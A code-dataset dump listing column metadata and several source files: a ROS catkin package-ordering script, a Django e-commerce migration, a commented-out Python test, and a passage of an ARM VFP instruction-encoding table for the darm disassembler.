hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
801d29ea0f445cc4a015a6b4894791ed1ccb9a07
| 563
|
py
|
Python
|
ep_ws/build/catkin_generated/order_packages.py
|
fsrlab/FSR_ROS_SIM
|
f22dfbd19ca1f2f1c7456fc51fb382509f9d7c62
|
[
"MIT"
] | null | null | null |
ep_ws/build/catkin_generated/order_packages.py
|
fsrlab/FSR_ROS_SIM
|
f22dfbd19ca1f2f1c7456fc51fb382509f9d7c62
|
[
"MIT"
] | null | null | null |
ep_ws/build/catkin_generated/order_packages.py
|
fsrlab/FSR_ROS_SIM
|
f22dfbd19ca1f2f1c7456fc51fb382509f9d7c62
|
[
"MIT"
] | null | null | null |
# generated from catkin/cmake/template/order_packages.context.py.in
source_root_dir = '/home/sim2real/ep_ws/src'
whitelisted_packages = ''.split(';') if '' != '' else []
blacklisted_packages = ''.split(';') if '' != '' else []
underlay_workspaces = '/home/sim2real/carto_ws/devel_isolated/cartographer_rviz;/home/sim2real/carto_ws/install_isolated;/home/sim2real/ep_ws/devel;/opt/ros/noetic'.split(';') if '/home/sim2real/carto_ws/devel_isolated/cartographer_rviz;/home/sim2real/carto_ws/install_isolated;/home/sim2real/ep_ws/devel;/opt/ros/noetic' != '' else []
| 93.833333
| 335
| 0.756661
| 77
| 563
| 5.285714
| 0.441558
| 0.206388
| 0.167076
| 0.186732
| 0.565111
| 0.565111
| 0.565111
| 0.565111
| 0.565111
| 0.565111
| 0
| 0.013233
| 0.060391
| 563
| 5
| 336
| 112.6
| 0.756144
| 0.115453
| 0
| 0
| 1
| 0.5
| 0.618952
| 0.612903
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
803504701a3cf401c13dc50ffb64243deaa7a721
| 1,966
|
py
|
Python
|
shop/migrations/0001_initial.py
|
chidibede/Django-Ecommerce-Site
|
c3a139ccf6e67ea90ab3879afcb16528be008548
|
[
"MIT"
] | null | null | null |
shop/migrations/0001_initial.py
|
chidibede/Django-Ecommerce-Site
|
c3a139ccf6e67ea90ab3879afcb16528be008548
|
[
"MIT"
] | null | null | null |
shop/migrations/0001_initial.py
|
chidibede/Django-Ecommerce-Site
|
c3a139ccf6e67ea90ab3879afcb16528be008548
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2 on 2019-06-08 10:32
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Adult_Products',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to='product_images')),
('name', models.CharField(max_length=200)),
('category', models.CharField(max_length=300)),
('slug', models.SlugField()),
('sales_price', models.IntegerField()),
('original_price', models.IntegerField()),
],
),
migrations.CreateModel(
name='Essential_Oils',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to='product_images')),
('name', models.CharField(max_length=200)),
('category', models.CharField(max_length=300)),
('slug', models.SlugField()),
('sales_price', models.IntegerField()),
('original_price', models.IntegerField()),
],
),
migrations.CreateModel(
name='Smart_Watches',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to='product_images')),
('name', models.CharField(max_length=200)),
('category', models.CharField(max_length=300)),
('slug', models.SlugField()),
('sales_price', models.IntegerField()),
('original_price', models.IntegerField()),
],
),
]
| 38.54902
| 114
| 0.544761
| 175
| 1,966
| 5.948571
| 0.325714
| 0.086455
| 0.103746
| 0.138329
| 0.81172
| 0.81172
| 0.81172
| 0.81172
| 0.81172
| 0.81172
| 0
| 0.023599
| 0.310275
| 1,966
| 50
| 115
| 39.32
| 0.7441
| 0.021872
| 0
| 0.767442
| 1
| 0
| 0.121291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.116279
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
804795ddc70fcb743a2b2214a7d1fe74c8e9ad6c
| 2,236
|
py
|
Python
|
tests/test_sphnf.py
|
JohnEdChristensen/NiggliOptimize
|
e90b8c66e7b7e560c460502ee24991af775c625b
|
[
"MIT"
] | null | null | null |
tests/test_sphnf.py
|
JohnEdChristensen/NiggliOptimize
|
e90b8c66e7b7e560c460502ee24991af775c625b
|
[
"MIT"
] | null | null | null |
tests/test_sphnf.py
|
JohnEdChristensen/NiggliOptimize
|
e90b8c66e7b7e560c460502ee24991af775c625b
|
[
"MIT"
] | null | null | null |
import pytest
import numpy as np
"""
def test_mono_39():
from pg_comp.base_mono import *
with open("tests/test_output/base_mono_1_200_n.out","r") as f:
n_500 = int(f.readline().strip())
srHNFs = []
for n in range(1,201):
temp = base_mono_37_39(n)
for t in temp:
if len(t) >0:
srHNFs.append(t)
assert len(srHNFs) == n_500
brute = []
with open("tests/test_output/base_mono_39_1_200_srHNFs.out","r") as f:
HNF = []
for line in f:
if len(line.strip().split()) == 0:
brute.append(HNF)
HNF = []
else:
HNF.append([int(i) for i in line.strip().split()])
for t in srHNFs:
assert t in brute
def test_mono_29():
from pg_comp.base_mono import *
with open("tests/test_output/base_mono_1_200_n.out","r") as f:
n_500 = int(f.readline().strip())
srHNFs = []
for n in range(1,201):
temp = base_mono_29_30(n)
for t in temp:
if len(t) >0:
srHNFs.append(t)
assert len(srHNFs) == n_500
brute = []
with open("tests/test_output/base_mono_29_1_200_srHNFs.out","r") as f:
HNF = []
for line in f:
if len(line.strip().split()) == 0:
brute.append(HNF)
HNF = []
else:
HNF.append([int(i) for i in line.strip().split()])
for t in srHNFs:
assert t in brute
def test_mono_28():
from pg_comp.base_mono import *
with open("tests/test_output/base_mono_1_200_n.out","r") as f:
n_500 = int(f.readline().strip())
srHNFs = []
for n in range(1,201):
temp = base_mono_28(n)
for t in temp:
if len(t) >0:
srHNFs.append(t)
assert len(srHNFs) == n_500
brute = []
with open("tests/test_output/base_mono_28_1_200_srHNFs.out","r") as f:
HNF = []
for line in f:
if len(line.strip().split()) == 0:
brute.append(HNF)
HNF = []
else:
HNF.append([int(i) for i in line.strip().split()])
for t in srHNFs:
assert t in brute
"""
| 27.268293
| 74
| 0.515206
| 332
| 2,236
| 3.292169
| 0.14759
| 0.087832
| 0.071363
| 0.093321
| 0.945105
| 0.945105
| 0.945105
| 0.945105
| 0.945105
| 0.945105
| 0
| 0.056591
| 0.351968
| 2,236
| 81
| 75
| 27.604938
| 0.697723
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
33a4eb8004a4d73add7bc089b176207822d20abb
| 39,949
|
py
|
Python
|
darmtbl3.py
|
TaintTrap/darm
|
f42b509adabbb3a0fbb87937db33d14c2d213bee
|
[
"BSD-3-Clause"
] | 104
|
2015-01-01T06:14:40.000Z
|
2021-12-11T08:05:03.000Z
|
darmtbl3.py
|
z4ziggy/darm
|
f42b509adabbb3a0fbb87937db33d14c2d213bee
|
[
"BSD-3-Clause"
] | 5
|
2015-02-09T10:16:50.000Z
|
2016-04-07T12:58:10.000Z
|
darmtbl3.py
|
z4ziggy/darm
|
f42b509adabbb3a0fbb87937db33d14c2d213bee
|
[
"BSD-3-Clause"
] | 18
|
2015-02-09T02:36:19.000Z
|
2019-07-19T15:29:20.000Z
|
from darmtbl2 import Bitsize, Rn, Rm, Rt, Rt2
from darmtbl2 import i, imm3, imm4, imm6, imm8, imm4H, imm4L
from darmtbl2 import P, W, D, N, M, cond
Vd = Bitsize('Vd', 4, 'Vector Destination Register')
Vn = Bitsize('Vn', 4, 'Vector Source Register')
Vm = Bitsize('Vm', 4, 'Second Vector Source Register')
Q = Bitsize('Q', 1, 'Q')
F = Bitsize('F', 1, 'Floating Point Operation')
T = Bitsize('T', 1, 'lowbit')
B = Bitsize('B', 1, 'B')
L = Bitsize('L', 1, 'shift amount etc')
U = Bitsize('U', 1, 'Unsigned')
E = Bitsize('E', 1, 'Quiet NaN Exception')
size = Bitsize('size', 2, 'VFP Vector Size')
sz = Bitsize('sz', 1, '1-bit VFP Vector Size')
sf = Bitsize('sf', 1, 'Vector Size')
sx = Bitsize('sx', 1, 'Bit Size')
cmode = Bitsize('cmode', 4, 'SIMD Expand Mode')
align = Bitsize('align', 2, 'Memory Alignment')
index_align = Bitsize('index_align', 4, 'Memory Index Alignment')
a = Bitsize('a', 1, 'Memory Alignment')
op = Bitsize('op', 1, '1-bit Operation')
op2 = Bitsize('op2', 2, '2-bit Operation')
type_ = Bitsize('type', 4, 'Some Type')
len_ = Bitsize('len', 2, 'Length for Vector Table Lookup')
opc1 = Bitsize('opc1', 2, 'opc1')
opc2 = Bitsize('opc2', 3, 'opc2')
opc2_2 = Bitsize('opc2', 2, 'opc2')
VFP_ARMv7 = [
('VABA<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 1, Vm),
('VABAL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 1, 0, 1, N, 0, M, 0, Vm),
('VABD<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 0, Vm),
('VABDL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 1, 1, 1, N, 0, M, 0, Vm),
('VABD<c>.F32', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 0, Q, M, 0, Vm),
('VABS<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 1, Vm),
('VADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VADD<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VADD<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VADDL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 0, 0, op, N, 0, M, 0, Vm),
('VAND<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VBIC<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VBIC<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('V<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, op2, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VCEQ<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
('VCEQ<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCEQ<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 0, Q, M, 0, Vm),
('VCGE<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 1, Vm),
('VCGE<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCGE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 1, Q, M, 0, Vm),
('VCGT<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 0, Vm),
('VCGT<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCGT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 0, Q, M, 0, Vm),
('VCLE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 1, Q, M, 0, Vm),
('VCLS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 0, Q, M, 0, Vm),
('VCLT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 0, 0, Q, M, 0, Vm),
('VCLZ<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 1, Q, M, 0, Vm),
('VCMP{E}<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 0, Vd, 1, 0, 1, sz, E, 1, M, 0, Vm),
('VCMP{E}<c>.F64 <Dd>,#0.0', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 1, Vd, 1, 0, 1, sz, E, 1, (0), 0, (0), (0), (0), (0)),
('VCNT<c>.8 <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 0, Q, M, 0, Vm),
('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 1, op2, Q, M, 0, Vm),
('VCVT{R}<c>.S32.F64 <Sd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 1, opc2, Vd, 1, 0, 1, sz, op, 1, M, 0, Vm),
('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>,#<fbits>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 1, 1, op, 0, Q, M, 1, Vm),
('VCVT<c>.<Td>.F64 <Dd>,<Dd>,#<fbits>', cond, 1, 1, 1, 0, 1, D, 1, 1, 1, op, 1, U, Vd, 1, 0, 1, sf, sx, 1, i, 0, imm4),
('VCVT<c>.F64.F32 <Dd>,<Sm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 1, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VCVT<c>.F32.F16 <Qd>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 1, 1, op, 0, 0, M, 0, Vm),
('VCVT<y><c>.F32.F16 <Sd>,<Sm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 1, op, Vd, 1, 0, 1, (0), T, 1, M, 0, Vm),
('VDIV<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 1, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VDUP<c>.<size>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, imm4, Vd, 1, 1, 0, 0, 0, Q, M, 0, Vm),
('VDUP<c>.<size>', cond, 1, 1, 1, 0, 1, B, Q, 0, Vd, Rt, 1, 0, 1, 1, D, 0, E, 1, (0), (0), (0), (0)),
('VEOR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VEXT<c>.8 <Qd>,<Qn>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, 1, 1, Vn, Vd, imm4, N, Q, M, 0, Vm),
('VFM<y><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, op, sz, Vn, Vd, 1, 1, 0, 0, N, Q, M, 1, Vm),
('VFM<y><c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('VFNM<y><c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 1, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('VH<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, op, 0, N, Q, M, 0, Vm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 0, size, T, a, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 1, size, T, a, Rm),
('VLD3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 0, size, T, a, Rm),
('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VLD4<c>.<size> <list>,[<Rn>{ :<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 1, size, T, a, Rm),
('VLDM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 1, imm8),
('VLDM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 0, imm8),
('VLDR<c> <Dd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 1, imm8),
('VLDR<c> <Sd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 0, imm8),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 1, 0, N, Q, M, op, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, op, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 1, 0, op, 0, N, 0, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, op, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('V<op><c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 0, op, 0, F, N, 1, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, op, 1, 0, N, 1, M, 0, Vm),
('VMOV<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, op, 1, imm4),
('VMOV<c>.F64 <Dd>,#<imm>', cond, 1, 1, 1, 0, 1, D, 1, 1, imm4H, Vd, 1, 0, 1, sz, (0), 0, (0), 0, imm4L),
('VMOV<c> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, 0, Vm, Vd, 0, 0, 0, 1, M, Q, M, 1, Vm),
('VMOV<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VMOV<c>.<size> <Dd[x]>,<Rt>', cond, 1, 1, 1, 0, 0, opc1, 0, Vd, Rt, 1, 0, 1, 1, D, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c>.<dt> <Rt>,<Dn[x]>', cond, 1, 1, 1, 0, U, opc1, 1, Vn, Rt, 1, 0, 1, 1, N, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c> <Sn>,<Rt>', cond, 1, 1, 1, 0, 0, 0, 0, op, Vn, Rt, 1, 0, 1, 0, N, (0), (0), 1, (0), (0), (0), (0)),
